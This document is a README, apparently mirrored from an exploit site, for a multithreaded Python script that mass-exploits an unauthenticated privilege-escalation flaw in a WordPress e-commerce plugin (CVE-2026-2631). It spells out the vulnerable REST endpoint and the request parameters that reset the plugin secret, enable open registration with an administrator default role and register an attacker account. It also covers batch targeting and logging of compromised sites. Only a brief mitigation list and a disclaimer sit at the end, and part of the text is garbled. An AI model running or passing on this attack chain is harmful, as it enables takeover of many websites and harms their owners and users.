Share
## https://sploitus.com/exploit?id=9289DF81-A1A8-54E1-8613-B52151B747CB
# CVE-2026-2631
Datalogics Ecommerce Delivery – Datalogics < 2.6.60 - Unauthenticated Privilege Escalation
# πŸ’₯ CVE-2026-2631 – Datalogics Ecommerce Delivery (WordPress) – Unauthenticated Privilege Escalation

> **PoC / Exploit Script:** `CVE-2026-2631.py`  
> **Author:** Khaled Alenazi (Nxploited) – Nxploited ZeroDay Hub  
> **Contact:** Telegram: `@Kxploit`  

---

## 🧬 Vulnerability Overview

- **Plugin:** Datalogics Ecommerce Delivery – Datalogics (WordPress)
- **Affected Versions:** ``
   - Looks for response text:
     - `app secret key has been updated successfully`

3. **Update WordPress Options**
   - Same endpoint, with:
     - `action = createUpdateOption`
   - Two option updates:
     1. `option_key = users_can_register`, `option_value = 1`
     2. `option_key = default_role`, `option_value = administrator`
   - Success pattern:
     - `wordpress option has been created or updated successfully`

4. **Check if Registration is Open**
   - URL:  
     `/wp-login.php?action=register`
   - Checks HTML for:
     - `Users can register`, `Anyone can register`, `user_registration`, `registerform`
   - Or detects explicit:
     - `user registration is currently not allowed`

5. **Attempt User Registration**
   - Same register URL.
   - Extracts `_wpnonce` from hidden input if present.
   - Sends registration POST:
     - `user_login`, `user_email`
     - `user_pass`/`user_pass2` if password fields exist
     - `_wpnonce`, `_wp_http_referer`, `redirect_to`, `wp-submit=Register`
   - Detects success by:
     - `registration complete`, `check your email`, `user registered`
   - If username already exists:
     - Marks as success: `user_already_exists`

6. **Logging**
   - Every successful option update (with or without registration success) writes a line to:
     - `Login_admin.txt`
   - Format:
     ```text
      | register_url:  | shop_secret:  | 
     ```

---

## 🧡 Multithreading Model

- Reads all targets from `list.txt` (or custom file).
- Splits targets into `N` chunks using `chunkify`.
- Launches `N` worker threads, each processing its own list of targets.
- Uses a shared `Queue` for status messages to the printer thread.
- A dedicated **printer thread** (`printer_loop`) updates a live `rich` table:
  - Shows index, site, status (SUCCESS/FAILED/ERROR), and detail.
  - Displays total processed and output filename.

---

## πŸš€ Usage

### 1️⃣ Basic Run

```bash
python3 CVE-2026-2631.py
```

You’ll be interactively prompted for:

1. **Targets file**  
   - Prompt: `Targets file (one host/URL per line) [list.txt]:`
   - Default: `list.txt`
   - Each line: domain or full URL
     - Examples:
       - `victim.com`
       - `https://target-site.com`
       - `http://example.org/blog`

2. **Threads**  
   - Prompt: `Threads (1-50) [10]:`
   - Default: `10`
   - Max: `50`  
   More threads = faster, but higher load on your system and targets.

3. **shop_secret value**  
   - Prompt: `shop_secret [Nxploited_newSecret]:`
   - Default: `Nxploited_newSecret`  
   This is the new secret key sent to `resetStoreConfigrations`.

4. **Registration credentials**  
   - `Registration username [Nx_test1]:`
   - `Registration email [nxploited1@gmail.com]:`
   - `Registration password [Nx_adminSA]:`

These creds will be used for the registration attempt on each vulnerable target.

---

### 2️⃣ Targets File Format

Create `list.txt` (or any file you want) with one target per line:

```text
example1.com
http://example2.com
https://shop.example3.net
blog.target-site.org
```

The script will:

- Auto-add `http://` if missing.
- Remove trailing `/`.

---

### 3️⃣ Output & Results

- All **successful** operations (even if user registration fails but options are set) are written to:

  **`Login_admin.txt`**

- A typical line:

  ```text
  http://example1.com | register_url: http://example1.com/wp-login.php?action=register | shop_secret: Nxploited_newSecret | reset_ok,option_ok,option_ok,register_open,registered user=Nx_test1 email=nxploited1@gmail.com pass=Nx_adminSA
  ```

- Examples of status in the live table:
  - βœ… `SUCCESS` – options set and/or user registered.
  - ❌ `FAILED` – reset/options failed, vulnerability not exploitable.
  - ⚠️ `ERROR` – Exception, network errors, timeouts, etc.

---

## 🧱 HTTP Endpoints & Parameters

### πŸ”“ Vulnerable REST Endpoint

```text
POST /wp-json/gsf/v1/update-options
```

#### 1. Reset `shop_secret`

```http
action=resetStoreConfigrations
shop_secret=
```

#### 2. Update Options

```http
action=createUpdateOption
shop_secret=
option_key=users_can_register
option_value=1
```

```http
action=createUpdateOption
shop_secret=
option_key=default_role
option_value=administrator
```

### πŸ§‘β€πŸ’» Registration Endpoint

```text
GET/POST /wp-login.php?action=register
```

The script:

- Extracts `_wpnonce` if present.
- Sends registration data with the provided username, email, and password (if fields exist).

---

## πŸ”§ Script Internals (Key Functions)

- `normalize_site(raw: str) -> str`  
  Normalizes target URLs.

- `send_reset_secret(site: str, secret: str, timeout: int = 10) -> (bool, str)`  
  Tries the `resetStoreConfigrations` action.

- `send_option(site: str, secret: str, key: str, value: str, timeout: int = 10) -> (bool, str)`  
  Sets WordPress options via the vulnerable endpoint.

- `check_registration_open(site: str, timeout: int = 10) -> (bool, str)`  
  Checks if registration is open and form is accessible.

- `try_register_user(...) -> (bool, str)`  
  Attempts to register the supplied user.

- `write_success_line(site: str, secret: str, detail: str)`  
  Logs success details into `Login_admin.txt`.

- `worker(...)`  
  Per-thread worker that:
  1. Resets `shop_secret`
  2. Sets options
  3. Checks registration
  4. Attempts registration
  5. Logs result and pushes status to queue

- `printer_loop(queue: Queue, total: int)`  
  Reads messages from the queue and updates a `rich` live table UI.

- `main()`  
  Orchestrates:
  - Banner
  - User prompts
  - Target loading
  - Thread spawning
  - Joining and final message.

---

## πŸ§ͺ Example Run (Interactive)

```text
$ python3 CVE-2026-2631.py

[Banner / ASCII Art]

Targets file (one host/URL per line) [list.txt]:
> list.txt

Threads (1-50) [10]:
> 20

shop_secret [Nxploited_newSecret]:
> NxSecret2026!

Registration username [Nx_test1]:
> admin_nx

Registration email [nxploited1@gmail.com]:
> admin@poc.local

Registration password [Nx_adminSA]:
> SuperStrongP@ss!

[Live table starts showing each target’s status]
Processed 5/20 targets Β· Output: Login_admin.txt

Done. Successful sites (if any) saved to Login_admin.txt.
```

---

## πŸ›‘οΈ Mitigation & Recommendations

> **For Defenders / Site Owners:**

- πŸ” **Update the plugin** to version **2.6.60 or later** immediately.
- 🧹 Review:
  - WordPress users list for unknown administrators.
  - Recent registrations in `wp_users`.
- πŸ”‘ Regenerate any secrets or keys used by the plugin.
- πŸ“œ Inspect access logs for hits to:
  - `/wp-json/gsf/v1/update-options`
  - `/wp-login.php?action=register`
- 🧱 Consider WAF rules to block unauthorized access to sensitive REST endpoints.

---

## ⚠️ Legal Disclaimer

> **This script is provided strictly for educational and authorized security testing purposes only.**

- You **must not** use this tool on any system, application, or network **without explicit written permission** from the owner.
- Unauthorized access, exploitation, or abuse of vulnerabilities is **illegal** and may result in **criminal charges**.
- The author (**Khaled Alenazi – Nxploited**), contributors, and distributors of this script:
  - ❌ **Do NOT** assume any responsibility or liability for:
    - Misuse of this code
    - Damage caused directly or indirectly
    - Any legal consequences resulting from its use
- By using this script, **you agree** that:
  - You are solely responsible for your actions.
  - You will comply with all applicable local, national, and international laws and regulations.
  - You will use this tool **only** in controlled environments and/or with **proper authorization** (PT/Red Team, bug bounty, lab, etc.).

If you do not agree with these terms, **do not use this script.**

---

## ❀️ Credits

- **Research & Exploit:**  
  - **Khaled Alenazi (Nxploited)** – Nxploited ZeroDay Hub
- **CVE:** `CVE-2026-2631`  
- **Contact:** `@Kxploit` on Telegram  

Stay safe, hack responsibly. πŸ•ΆοΈπŸ’»